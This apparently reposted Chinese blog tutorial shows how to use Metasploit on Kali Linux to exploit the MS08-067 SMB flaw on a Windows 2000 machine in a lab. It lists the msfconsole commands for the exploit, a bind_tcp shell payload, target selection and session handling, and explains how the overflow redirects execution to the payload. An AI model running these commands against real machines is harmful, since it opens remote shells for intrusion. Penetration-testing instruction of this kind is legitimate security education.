Kali linux 2016.2(Rolling)的利用MSF攻击windows小案例(exploits + payloads + taegets)(博主推荐)
2024-10-01 12:46:35
不多说,直接上干货!
本博文举的例,是利用远程溢出windows服务器。
Exploit/windows/smb/ms08_067_netapi。
Payload : windows/shell/bind_tcp
Target: windows 2000
以下是受害者机器情况。
以下是攻击者机器
这是show exploits
use exploit/windows/smb/ms08_067_netapi
以下是show payloads
set PAYLOAD windows/shell/bind_tcp
set RHOSt 192.168.0.15
show targets
如果将targets什么都不设置,或者设置为0的话,它就是自动探测。
即,此刻,就是已经成功攻下了受害者机器。
然后,做我们想要做的事情了。
它会将我们从攻击者到受害者机器,的这一过程建议一个会话。在后台。
通过session来查看。
通过session -h来查看session命令的使用。
一般用session -i 编号来切入到会话。
总结 exploits + payloads + taegets
1、连接到远程系统的漏洞端口
2、交换协议序列直到到达漏洞触发点
3、注入利用代码,其中包含了直接或间接的修改
返回地址为我们payload的指令以及nop指令,这增加了我们的代码被执行的机会。
4、 后续利用,可以是在受害主机上绑定任意端口的命令提示符或一个已经被创建的用户连接到远程系统或可能是一个GUI客户端连接到远程系统
最新文章
- 讲解JS的promise,这篇是专业认真的!
- 关于padding与margin的区别
- sdutoj 2151 Phone Number
- windows 7 下安装 IIS 和 ArcGis Server 9.3 遇到的问题及解决方法
- Java—static、this、super用法总结
- 支付宝开发(一)-认识php openssl RSA 非对称加密实现
- mysql 保留的关键字
- RMAN传输表空间迁移数据
- VIM命令集
- loadrunner入门篇-Analysis 分析器
- JDK1.8源码(七)——java.util.HashMap 类
- document.getElementById(), getElementsByname(),getElementsByClassName(),getElementsByTagName()方法表示什么以及其意义
- DLG消息
- cbow与skip-gram
- .Net ASP.NET 打开指定文件夹
- siege 高并发测试工具
- 【Oracle】【6】去掉字符串最后一个特殊字符
- 【九校联考-24凉心模拟】锻造(forging)
- UVa 442 Matrix Chain Multiplication(栈的应用)
- testng入门教程16数据驱动(把数据写在xml)